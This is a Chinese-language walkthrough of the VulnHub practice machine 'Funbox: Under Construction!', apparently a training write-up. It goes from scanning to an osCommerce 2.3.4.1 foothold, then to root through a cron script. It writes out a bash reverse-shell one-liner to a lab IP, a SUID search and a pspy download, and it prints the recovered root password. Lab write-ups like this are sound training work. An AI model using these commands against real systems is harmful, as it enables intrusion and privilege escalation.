- 英文名称:FUNBOX: UNDER CONSTRUCTION!
- 中文名称:Funbox:正在建设中!
- 发布日期:2021 年 6 月 20 日
- 难度:容易
- 描述:这是面向初学者的基础级 BootToRoot 机器。有两个标志。
- 下载地址:
https://www.vulnhub/entry/funbox-under-construction,715/
1、主机发现
2、端口扫描
3、访问首页(乱七八糟看不懂)
Khronos 是一个现代时尚的免费 html 网站,为推出您未来的超棒产品和服务而创建的模板。
生于烦恼的人永远不会有烦恼。 因为它是生命本身,它在时间里。 拒绝的后果。 或存在但存在。
让它成为我们可以的。 让苦难被说成是需要的祝福。
或者,我们更严厉的快乐会因我们的巨大指控而产生巨大的结果和结果。
你必须时不时见到他。 我会拒绝和开放那些为了跟上时代的乐趣而锻炼的人。
没有人会以任何理由取悦任何人。
他选择了一些伟大的建筑师和排斥者 好像他没有快乐,但即使是那些在 错误和谁。
但很容易进一步阻碍。 否则,我们的更严厉的快乐将产生巨大的影响和指责。
但它会因为选择现在而产生。 让他想变老还是因为我们指责他惹麻烦。
确实,没有人天生如此。 然而,这是建筑师的错误。 要避免被排斥。
被极度不适的痛苦的快乐所蒙蔽,被任何人的痛苦蒙蔽了双眼的快乐更加严酷。
这是他们不知道的飞行,我们带领他们寻找和取悦出生的人。
4、目录发现
5、访问(osCommerce v2.3.4.1)
欢迎来到 osCommerce Online Merchant v2.3.4.1!
osCommerce Online Merchant 帮助您通过自己的在线商店在全球销售产品。
其管理工具管理产品、客户、订单、新闻通讯、特价商品等,以成功建立您的在线业务的成功。
osCommerce 吸引了庞大的商店所有者和开发人员社区,他们相互支持,
并提供了 7,000 多个免费插件,可以扩展您的在线商店的功能和潜力。
6、检索web漏洞
7、尝试反弹shell
bash -c "exec bash -i &>/dev/tcp/192.168.199.247/7777 <&1"
8、反弹shell成功了
9、切换shell,便于后续sudo
python -c 'import pty;pty.spawn("/bin/bash")'
10、检查敏感文件
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
11、下载 pspy
pspy 是一个命令行工具,旨在侦听进程而无需 root 权限。
它允许您在执行时查看其他用户、cron 作业等运行的命令。
非常适合在 CTF 中枚举 Linux 系统。
也很高兴向您的同事展示为什么在命令行上将秘密作为参数传递是一个坏主意。
该工具从 procfs 扫描中收集信息。
放置在文件系统选定部分的 Inotify 观察程序会触发这些扫描以捕获短期进程。
https://github/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
12、运行pspy,发现定时脚本
13、查看cron.sh,并做base64解码,得到root密码
14、切换root用户,获得flag
www-data@funbox10:/usr/share/doc/examples$ su - root
su - root
Password: rfvbgt!!
root@funbox10:~# whoami
whoami
root
到此,实验完成~
更多推荐
vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)
发布评论